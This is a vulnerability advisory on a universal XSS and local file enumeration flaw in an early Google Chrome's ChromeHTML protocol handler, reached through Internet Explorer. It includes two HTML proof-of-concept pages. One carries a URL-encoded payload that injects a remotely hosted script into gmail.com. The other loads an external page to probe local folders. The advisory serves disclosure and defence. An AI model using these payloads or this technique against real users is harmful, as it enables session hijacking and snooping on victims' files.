# Google Chrome ChromeHTML Protocol Handler Universal XSS

High

## Vulnerable Version

1.0.154.55 and earlier

## Mitigation

Apply 1.0.154.59 or later.

## Technical Details

A vulnerability in the ChromeHTML URL handler, allows forcing Google Chrome load arbitrary URIs when it is launched through IE. Combined with other issues, this seemingly harmless vulnerability opens the door to two major attack vectors:

• Bypass the Same Origin Policy restrictions for any site (this has the same impact as Universal XSS)
• Enumerate victim’s local files and directories.

It is important to note that the way Internet Explorer processes URL protocol handlers is a known Achilles’ heel and has been widely used previously to attack other various applications.

## Proof-of-Concept

Universal XSS:


<html>
<!--[if IE]>
<p>This PoC will launch Chrome, redirect it to http://www.gmail.com and execute arbitrary JavaScirpt on that domain.</p>
<p>Launching chrome...</p>
<script> document.location = 'chromehtml:"80%20javascript:document.write(unescape(\'%3C%73%63%72%69%70%74%25%32
%30%73%72%63%3D%68%74%74%70%3A%2F%2F%62%6C%6F%67
%2E%77%61%74%63%68%66%69%72%65%2E%63%6F%6D%2F%66
%69%6C%65%73%2F%6A%73%2E%6A%73%3E%3C%2F%73%63%72
%69%70%74%3E\'))"';
</script>
<![endif]-->
<p>In order for the POC to work you need Internet Explorer 7 and Google Chrome version &lt; 1.0.154.59.</p>
</html>


File Enumeration:

<title>Google Chrome local files and folders enumeration</title>
<!--[if IE]>
<p>This PoC will launch Chrome with four arbitrary directories and an attacker-controlled web page.<br> The web page is used to enumerate local files and folders using a known history hack</p>
<script>
document.location = 'chromehtml:"80%20c:/exists%20c:/nonexisting%20
c:/windows%20c:/winnt%20http://blog.watchfire.com/files/historyhack.html"';
</script>
<![endif]-->
<p>In order for the POC to work you need Internet Explorer 7 and Google Chrome version &lt; 1.0.154.59.</p>
</html>


• Roi Saltzman